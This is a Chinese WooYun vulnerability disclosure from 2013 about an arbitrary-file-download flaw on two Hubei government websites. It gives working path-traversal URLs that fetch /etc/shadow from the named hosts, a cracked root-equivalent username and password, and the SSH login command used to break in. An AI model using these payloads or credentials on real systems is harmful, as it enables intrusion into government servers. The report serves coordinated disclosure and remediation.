漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-025033
漏洞标题:湖北两省级政府网站基于任意文件下载成功入侵实例
相关厂商:湖北两省级政府网站
漏洞作者: 小点兵
提交时间:2013-06-03 14:37
修复时间:2013-07-18 14:38
公开时间:2013-07-18 14:38
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:18
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-06-03: 细节已通知厂商并且等待厂商处理中
2013-06-06: 厂商已经确认,细节仅向厂商公开
2013-06-16: 细节向核心白帽子及相关领域专家公开
2013-06-26: 细节向普通白帽子公开
2013-07-06: 细节向实习白帽子公开
2013-07-18: 细节向公众公开
简要描述:
湖北两省级政府网站可下载/etc/shadow,通过破解,获得拥有root权限的用户名与密码。由于网站对外开放ssh,成功入侵。
详细说明:
站点一,湖北省人民政府机关事务管理局 http://www.jghq.gov.cn/
漏洞点:http://www.jghq.gov.cn/download.jsp?fileName=../../../../etc/shadow
站点二,湖北省知识产权局(这个局有两个domain) http://www.hbipo.gov.cn/ 以及 http://2.zbsjzd.org.cn/
漏洞点: http://www.hbipo.gov.cn/download.jsp?fileName=../../../../etc/shadow 以及 http://2.zbsjzd.org.cn/download.jsp?fileName=../../../../etc/shadow
漏洞证明:
先破解www.jghq.gov.cn的shadow, 拿John the Ripper password cracker进行破解,1分钟不到,出来3个账号,如下图:
注意最后一个“zcfg:zcfg123:0:0::/var/www/zcfg:/bin/bash” UID和GID都是0,root权限,很不错。
ssh连上去,“ssh -l zcfg www.jghq.gov.cn”密码“zcfg123”。运行命令"whoami",果然root权限,并不错。如下图:
然后破解www.hbipo.gov.cn以及2.zbsjzd.org.cn的shadow,发现用户名和密码一样的,仔细以观察,原来是同一台机器,ip都是219.139.243.203。好吧,原来是一台机器上开了多个站点服务,运行在不同的虚拟目录下面而已。
ssh链接www.hbipo.gov.cn, 如下图:
经分析,www.jghq.gov.cn在目录/var/www/jghq_utf8/下,而www.hbipo.gov.cn在目录/var/www/hbipo/front/下。为验证分析的正确性,分别在两个目录下建立了test.htm文件,可以通过http://www.hbipo.gov.cn/front/test.htm以及http://www.jghq.gov.cn/test.htm访问。
到此打住,不再进行内网渗透。
修复方案:
过滤
web服务器不要运行在root权限下
用户名密码过于简单
ssh还是不要对外开放链接的好,即使开放,建议不要使用默认的22端口
请修复时,将我添加的/var/www/jghq_utf8/test.htm和/var/www/hbipo/front/test.htm删除,谢谢!
版权声明:转载请注明来源 小点兵@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2013-06-06 08:43
厂商回复:
CNVD确认并复现所述情况(含文件包含及弱口令情况),已经在5日转由CNCERT下发给湖北分中心,由其以正式函件方式通报当地主管部门。
按多个案例进行评分,rank=12+8=20
最新状态:
暂无